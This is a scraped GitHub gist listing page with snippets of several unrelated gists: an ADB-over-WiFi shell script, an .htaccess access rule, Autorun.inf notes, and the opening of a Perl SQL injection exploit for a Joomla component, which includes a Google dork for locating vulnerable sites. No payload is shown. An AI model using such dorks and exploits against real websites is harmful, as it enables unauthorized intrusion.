Skip to content

Instantly share code, notes, and snippets.

View Longturd's full-sized avatar
🎯
Focusing

Jason Lickliter Longturd

🎯
Focusing
View GitHub Profile
@amanshuraikwar
amanshuraikwar / adbwificonnect.sh
Last active May 4, 2025 16:44
Shell script to connect a USB connected device via adb over WiFi
# Purpose: Shell script to connect a USB connected device via adb over WiFi
#
# Author: Amanshu Raikwar
#
# Assumptions:
# 1. USB debugging is enabled in the Android device
# 2. The Android device is connected to the computer via USB
# 3. The Android device is connected to the same wifi as the computer
# 4. The Android device is accessible through port 5555 over the wifi network
#
@archatas
archatas / .htaccess
Created July 26, 2017 23:19
Allow access to a website only to specific user agents or visitors with authentication credentials
SetEnvIf User-Agent ^VipAgent1 vip_agent
SetEnvIf User-Agent ^VipAgent2 vip_agent
Order Allow,Deny
Allow from env=vip_agent
AuthType Basic
AuthName "Protected Login"
AuthUserFile /path/to/htpasswd
Require valid-user
#!/usr/bin/perl
#Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit
#Google Dork: inurl:index.php?option=com_s5clanroster&
#Vendor HomePage: http://www.joomla.org/
system("clear");
system("cls");
print "=========================================================\n";
print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n";
print "* Coded dreadpiratesr *\n";
print "* *\n";
#!/usr/bin/perl
use LWP::UserAgent;
use LWP::Simple;
use strict;
use warnings;
use threads;
use threads::shared;
use Config;
use HTML::TreeBuilder;
@Walkman100
Walkman100 / Autorun.inf Commands.md
Last active November 28, 2024 18:23
Autorun.inf Commands (Windows)

OUTDATED. PLEASE SEE gists/Autorun.inf Commands.md

The Autorun script file at [DeviceLetter]\Autorun.inf can be used to do a variety of things.

Valid line entries are:

  • [autorun]
    • Required Header
  • Label=
    • Name of device as shown in Computer.